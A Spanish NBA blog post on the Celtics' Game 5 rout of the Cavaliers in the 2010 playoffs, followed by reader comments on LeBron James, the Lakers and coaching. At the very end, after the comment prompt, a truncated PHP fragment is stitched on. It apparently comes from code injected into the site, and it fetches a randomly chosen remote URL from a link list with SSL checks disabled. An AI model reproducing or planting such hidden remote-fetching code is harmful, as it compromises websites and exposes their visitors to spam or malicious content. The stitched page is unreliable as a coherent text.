Playoffs 11/05/2010: Camino a la perdición

12 de May de 2010 por TheDeerHunter

Se encienden todas las alarmas en Cleveland. En el resguardo de su Quicken Loans Arena, el mejor equipo local de los últimos años no podía fallar bajo ningún concepto. Pero vaya si se falló… Los Celtics le infligieron anoche a los Cavs la mayor paliza que nadie ha dado en el 5º partido de unas series empatadas en toda la historia de la competición, con todo lo que conlleva una victoria en el 5º encuentro de una eliminatoria a 7.

Todo en el bando verde salió a pedir de boca. Fue el mejor momento para ver resurgir al célebre “Big Trío” de sus cenizas: 64 puntos entre Pierce, Allen y Garnett, siempre por encima del 50% y con un 7 de 12 desde más allá de la línea de tres; 20 rebotes; 12 asistencias… y lo que es más importante, un brillo en sus ojos, una intensidad, una mirada… que acojona tronco, acojona. Es el toque del campeón. Se puede ser magnífico, tan bueno como el que más… pero eso se tiene o no se tiene. Los Celtics ya sabemos que lo tienen.

Y en esta ocasión, con el “Big Three” abriendo brecha más Rondo dirigiendo con sobriedad y madurez (la que nos tiene acostumbrados) la segunda línea fue capaz de hacer sangre. ¿Pedíais la titularidad para “Big Baby? Pues fue casi premonitorio. En poco más de 20 minutos 15 puntos, 4 rebotes, 1 asistencia y un robo, y los Cavaliers no sabían ya de donde les llovían las tollinas. Añadir una actuación sólida de Kedrick Perkins y Tony Allen y tenemos una macedonia muy indigesta para LeBron y los suyos. Hasta Shelden Williams tuvo sus minutos de gloria… Los Celtics fueron superiores en todo.

¿Qué le pasa a LeBron? ¿Codo o caquita? Anoche cuajó un partido infame con apenas un 30% en tiro, junto con Jamison y Mo Williams, que se vinieron abajo en cascada. Sólo Shaq, Anthony Parker y algo Varejao aguantaron el chaparrón. Perdidos en ataque y en defensa borrados bajo tablero, estuvieron infames en el tiro y perdieron casi 20 balones. El recibimiento que les van a dar en Boston va a ser alucinante.

El sabio Derek Fisher, que algo sabe de todo esto, lo dijo el otro día. Estos son Playoffs. Tanto las victorias como las derrotas no sirven de nada para el próximo partido. Esta serie lo ilustra mejor que ninguna. Ya se pueden aplicar los Cavs ahora, que vienen curvas.

PREMIOS

MVP: Compartido entre Paul Pierce y Ray Allen. El primero se quedó a 3 asistencias del triple doble y el segundo anotó 25 puntos con buenos porcentajes de tiro. Anoche todo les fue de cara.

Sorpresa: Aprovechando el festival verde a domicilio Glen Davis también hizo de las suyas, 15 puntos y 4 rebotes en 21 minutos de juego.

Decepción: Posiblemente ayer pudimos presenciar el peor partido de LeBron James en mucho tiempo. 15 puntos con 3 de 14 en tiros de campo, totalmente controlado por el entramado defensivo de Boston.

Esfuerzo en vano: Shaquille O’Neal fue el mejor hombre de Cleveland anoche aunque cueste de creer. Anotó 21 puntos y puso 4 tapones. Lo único bueno de los Cavs.

Y MAÑANA…

Descanso en la NBA pero no en el blog. Permaneced conectados.

Comenta

27 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Sensacional el tweet de John Hollinger (ESPN) anoche: “One of biggest playoff wins in KNICKS history.”

      Citar

  2. Love Denise dice:
    #2

    No quiero subestimar a los Celtics, pero en mi opinión creo que los Cavs son los que se están cavando su propia tumba, bien por la lesión de James y/o por al rendimiento de sus hombres secundarios. En condiciones normales, los Celtics nunca podrían darle estas palizas a los Cavs, y más aun con un Garnett que no es el de hace 2 años.
    Creo que por el sur y por el suroeste, celebrarían si los Celtics son capaces de eliminar a Cavs. Creo!!

      Citar

  3. MagicJohnson32 dice:
    #3

    Otis Smith ya ha puesto a enfriar la botella de champagne, jeje.

      Citar

  4. TheDeerHunter dice:
    #4

    no creo que muchos Lakers quieran ver a los Celtics en la final

      Citar

  5. Love Denise dice:
    #5

    al menos tendrían el factor cancha

      Citar

  6. sayim dice:
    #6

    Pues yo creo que para Lakers el mejor rival posible son los Celtics (por encima de Magic o Cavs). Si finalmente llegan lo harán con las pilas en la reserva (modo Hawks), además de jugar a un ritmo que beneficia a Lakers. Además no me imagino que pueden poner los verdes en frente del juego interior angelino (tal y como está ahora mismo…). El único problema sería defender a Rondo y creo que cuentan con el jugador que mejor se adapta al juego de este, S. Brown con su velocidad y sus piernas (además de la intimidación de los interiores). En último caso podrían poner a Kobe sobre el.

    Para mi una final Lakers-Celtics con ventaja de campo para los antelinos no se va más allá de 5 partidos.

    No entiendo porque los aficionados amarillos no van a querer enfrentarse con los C’s, con la oportunidad de tomarse revancha de las finales de 2008.

    Me gustaría otra final entre los dos equipos más laureados, pero sigo creyendo que será Lakers-Orlando

    Un saludo

      Citar

  7. TheDeerHunter dice:
    #7

    Los Celtics son los Celtics más allá de cualquier otra consideración.
    Hay variables en el mundo del deporte que no se pueden explicar con tener mejor equipo o estar más en forma y no sé cuantas finales han perdido de todas las que han jugado.

    Por mi parte, cuanto más lejos mejor y prefiero a cualquier otro como rival que a ellos.

    No hay mucho más que decir al respecto.

      Citar

  8. MagicJohnson32 dice:
    #8

    Jojo, pues anda que no firmo yo ahora mismo, con sangre si hace falta, tener a los Celtics como rival en las Finales…

      Citar

  9. pcerezo dice:
    #9

    Todavía tienen que ganar los Celtics. Queda un partido en Boston y allí ya ganaron los Cavs, pero da la sensación que la cuestión psicológica la tienen ganada los de Verde.
    Yo creo que los Lakers prefieren a Magic y Cavs por la cuestión experiencia y afición, muy diferente a la de Boston.
    Pero también a estas alturas de PO tengo claro que Lakers son favoritos a todo si Pau mantiene el nivel. Es la gran diferencia.

      Citar

  10. pcerezo dice:
    #10

    Por cierto yo creo que el único entrenador que le ha ganado en una serie ha sido Rivers en el 2008.

      Citar

  11. Toni dice:
    #11

    El tweet es lo mejor. Si caen los Cavs podríamos decir que Lebron volaría hacia la manzana con total seguridad, ¿no?

    Pues un golpe de confianza de este tipo era lo que le faltaba a estos Celtics que con la eclosión de Rondo y la parcial recuperación de Garnett (no es el de antes) pueden tener de sobras para apear del título al equipo del flamante MVP. Que rabia no haber visto el partido…

      Citar

  12. sergio dice:
    #12

    Simplemente genial el Sr. Hollinger.

    Si me hubiesen preguntado que hubiese tenido que pasar para que los Celtics ganaran la serie a los Cavs, seguramente hubiese dicho todo lo que sucedió ayer: mal partido de LeBron, secundarios que no tomar responsabilidades (problema de Mike Brown), Allen enchufa lo que le llegue, Pierce y Garnett demuestran lo que han sido para la liga, Rondo cumple en direccion y defensa, y algún suplente interior aporta su granito de arena.

    Quedan dos partidos. Cada uno en una pista. Me niego a creer que en una serie en la que se han ganado 3 partidos fuera de los 5 disputados, el factor cancha pueda ser ahora mismo un factor determinante.

    No tengo dudas de que los Cavs tienen suficiente plantilla para darle la vuelta al asunto y llevarse la serie. Lo que más debería preocuparle a los seguidores de Ohio es que los verdes han dado muchas muestras de como se puede parar a este equipo sin contar con sus estrellas a un gran nivel durante la mayor parte de la serie. Todos han cumplido con su papel anotador en algun partido de la serie. Precisamente esa es la mejor arma de los Magic. Si el equipo de James pasa la eliminatoria, dudo que lo hagan ante los Magic (aunque esto son Playoffs y Dios sabe…)

    Por cierto pcerezo, no se a que te refieres cuando dices que es el unico entrenador que le ha ganado una serie. ¿Dices a Phil Jackson?. 8 veces ha perdido series desde que es entrenador (3 con los Bulls y 5 con los Lakers). Si te refieres a Finales, la que nombras contra Boston y la de los “cuatro fantasticos” contra Detroit. Lo unico que se me puede ocurrir que estes nombrando es las series perdidas en Playoffs por el duo Kobe-Gasol. ¿Es eso?

      Citar

  13. TheDeerHunter dice:
    #13

    Creo que lo que quería decir Pablo es que Rivers es el único que ha ganado una serie a los Lakers desde que Pau llegó al equipo.

    Rivers a mí también me da más miedo que ninguno de los otros que quedan en la palestra. Aunque me ha sorprendido mucho Gentry y veremos hasta que punto es capaz de seguir sorprendiéndome.

      Citar

  14. Rafa dice:
    #14

    Espeluznante el trabajo de anoche de Doc Rivers motivando en los tiempos muertos. Cito literalmente su discurso en un tiempo muerto del 2º cuarto, antes de romper el partido:

    “… Everybody wants to win today, but we cannot do individually. Let´s do it together, let´s do it together, LET´S DO IT TOGETHER…”

    Por cierto, durante el último cuarto me pareció ver a Rondo aguantando la risa mientras Shaq lanzaba tiros libres. ¿Alguien más vio la imagen?

      Citar

  15. pcerezo dice:
    #15

    Claro que Jackson ha perdido series y muchas. Lo que me refería es que Rivers ha sido el único que le ha ganado desde la banda a Jackson en eliminatorias, debía también haber incluido a Larry Brown en 2004.
    Creo que las demás que ha perdido no ha sido peor entrenador que el que le ha ganado.
    Puede que esté equivocado pero el duelo Rivers-Jackson es mucho más igualado que si se enfrentara a Van Gundy (veremos si ha aprendido del año pasado) y con Mike Brown (mejor ni entrar a analizarlo).

    Creo que Jackson y Rivers son los mejores entrenadores de la liga junto a Adelman y George Karl (para mi gusto).

    Pablo

      Citar

  16. pcerezo dice:
    #16

    Perdonand me he explicado mal en el comentario.

    Por cierto estoy destrozado Paco González fuera de Carrusel Deportivo.

    Pablo

      Citar

  17. sergio dice:
    #17

    Yo meteria a Popovich en el saco. Es el tipo de entrenador diferente, motivador y tactico que gana eliminatorias. Amen de que conoce muchas de esos “aspectos extradeportivos” destinados a minar la motivacion de los rivales para hacer daño en las series. Lo que hacia Bowen en muchos momentos me recordaba a Rodman pellizcando (a veces incluso en la entrepierna o el culo) disimuladamente a Malone, soplandole al oido, pegandose a el hasta cuando el juego estaba detenido… ¡Que grande el gusano!

      Citar

  18. pcerezo dice:
    #18

    Pero nunca le ganó con peor equipo que Jackson, en cambio Jackson sí que le ganó con peor equipo.

      Citar

  19. sergio dice:
    #19

    Si, si.. yo solo decia que me parece de los mejores entrenadores actuales.

      Citar

  20. Jabho dice:
    #20

    A pesar de que hace tiemplo que comento / escribo poco en el blog lo sigo bastante de cerca. Me sorprenden muchos de los comentarios de falta de confianza en los Celtics. Estos Celtics han jugado 2 PO y si algo han demostrado es que han sabido competir en ambos…. Hace dos años campeones y el año pasado sin KG ni Powe, con Perkins-Davis-Scalabrine de juego interior, jugaron dos eliminatorias durísimas…

    Creo que la eliminatoria con los Cavs está abierta, que no es poco. Pero si algo han demostrado los verdes es que jueguen contra quien jueguen hay que pelear para ganarles… los Magic por ejemplo no han demostrado lo mismo.

    Sin duda Rivers es uno de los grandes (y a Mike Brown le viene grande el reto)

      Citar

  21. TheDeerHunter dice:
    #21

    sólo hay una cosa con la que no estoy de acuerdo con Jabho.
    Creo que los Magic están maduros para competir contra cualquiera… y los Cavs también, pero están sometidos a una presión adicional que no debería tener sentido.
    En cualquier caso me parecen 3 rivales muy a tener en cuenta.

      Citar

  22. Viru dice:
    #22

    Me ha encantado lo de Acojona, tronco, acojona.

      Citar

  23. TheDeerHunter dice:
    #23

    La expresión no es mía, pero gracias.

    Me he fijado en tu blog y tiene buena pinta… cuando tenga tiempo lo exploraré como se merece

      Citar

  24. Viva_Dirk dice:
    #24

    La paliza táctica que le esta pegando Rivers a Brown no tiene nombre, en todo el partido fueron capaces de parar la jugada preparada para Allen, y es la de toda la vida para un tirador que no te la pueden hacer durante todo el partido. Le saca partido a Tony Allen con puertas atrás y jugadas simples mientras un tio con la capacidad de A.Parker se muere de asco, casi igual que Jamison.

    Garnett no es el de hace 2 años pero desde luego esta mejor que el año pasado, anota con facilidad desde la media distancia y ya va peleando bien en el poste.

    Y la defensa de Mo Williams fue de risa, pero en general me parece que la batalla del banquillo puede decidir la guerra.

      Citar

  25. Viru dice:
    #25

    ya, ya… es que yo, hace tiempo…. http://www.viruete.com/articulos/2006/acojona.htm

      Citar

  26. max dice:
    #26

    Sergio, ya que has hablado del gusano Rodman, me viene a la memoria Chuck Daly, el gran entrenador de los Bad Boys de finales de los 80. Ganaron dos finales a base de defensa, orgullo, sacrificio y la calidad de alguno de sus jugadores: Isiah Thomas, Joe Dumars… Los demás, a jugar fuerte: Laimbeer, Mahorn, Rodman, Salley,…. En aquella epoca yo era fan de los Warriors de Chris Mullin, pero me impactó el estilo de juego de esos Pistons.

      Citar

  27. HeiNeKeN dice:
    #27

    adios a LeBron jaja

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>